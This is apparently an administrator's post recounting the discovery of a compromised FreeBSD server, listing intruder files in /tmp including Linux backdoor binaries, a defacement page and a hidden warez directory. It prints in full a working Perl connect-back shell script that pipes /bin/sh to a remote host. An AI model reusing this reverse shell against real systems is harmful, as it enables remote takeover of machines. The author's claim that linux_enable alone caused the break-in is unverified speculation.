avaurus

FreeBSD is one of the most secure os available you might think, but even if you secure it with the nice openbsd packetfilter, there are some problems you can encounter. In my case the following line in /etc/rc.conf was the reason for the server being hacked:

linux_enable="YES"

Set this to "NO" if you have this line. I noticed the "hack" when I realized that /tmp was a bit big:

bash-2.05b# du -sh /tmp
 11G    /tmp
bash-2.05b#

Then I have found the file "shell" in /tmp:

bash-2.05b# file /tmp/shell
/tmp/shell: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
bash-2.05b#

Keep in mind that we are still talking about a freebsd. I tried executing this file and it works. My firewall setup was secure in my point of view. I blocked everything but made some exceptions. So I passed http and ftp over an ftp-proxy shipped with freebsd. Nothing else... SSH was only allowed from specific IP's. My home IP and the IP at work. After the detection of that "shell" binary, I disabled linux_enable and began to search for other exploits and I found something. The next thing I found was the following script:

#!/usr/bin/perl
#
# A perl based connect back shell
#
# usage:
#
# $netcat -l -s 127.0.0.1 -p 10001
# $./cbs.pl 127.0.0.1 10001
#
# qobaiashi@u-n-f.com
#
use Socket;

$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';

$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($execute);
close(STDIN);
close(STDOUT);

clever and sad fpr me... Next file I found is "dc" in /tmp:

bash-2.05b# file dc
dc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
bash-2.05b# ./dc
Data Cha0s Connect Back Backdoor

Usage: ./dc [Host] <port>
bash-2.05b#

Ok, no comment... Next file found is "index.php" in /tmp:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<div align="center"><img src="top.jpg" width="500" height="375"> <br>
  <font size="2" face="Tahoma"><strong><br>
  illusion boys i&aacute;&aacute;&aacute;&aacute;&aacute;&aacute;<br>
  a for&ccedil;a est&aacute; conosco :)<br>
  <br>
  <font color="#FF3399">filhote e lord_devil ;***</font></strong></font></div>
</body>
</html>

*phew. I have still 11G in /tmp, so I searched the big location:

bash-2.05b# du -sh .sess_f5854f3eee756bad71306289160389JJ
 11G    .sess_f5854f3eee756bad71306289160389JJ
bash-2.05b#

I got it!

bash-2.05b# ls .sess_f5854f3eee756bad71306289160389JJ
Benny.And.Joon-(Johnny_Deep).DvdRip.[By.Caly-AsTrA].avi LULA.3D-DEViANCE.rar                                    mybot.state
Casanova.2005.iTALiAN.MD.TC.XviD-SiLENT.CD1.avi         RAINBOW.SIX.LOCKDOWN-DEViANCE.rar                       mybot.state~
Casanova.2005.iTALiAN.MD.TC.XviD-SiLENT.CD2.avi         WINTER.CHALLENGE-DEViANCE.rar                           xh
Duma.2005.XviD-ITALiAN.DVDRIP.DeLuXe.avi                Winning_Eleven_9_International_Usa_PS2DVD-GAMEOVER.rar
Infodll.state                                           httpd
bash-2.05b#

Cool, warez on my server ! brrr...rm -rf ./* ? No, I will do different things with those files... And another interesting file: "xh":

bash-2.05b# file xh
xh: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
bash-2.05b#

I deleted all that crap, set linux_enable to "NO" and hope that I am happy now .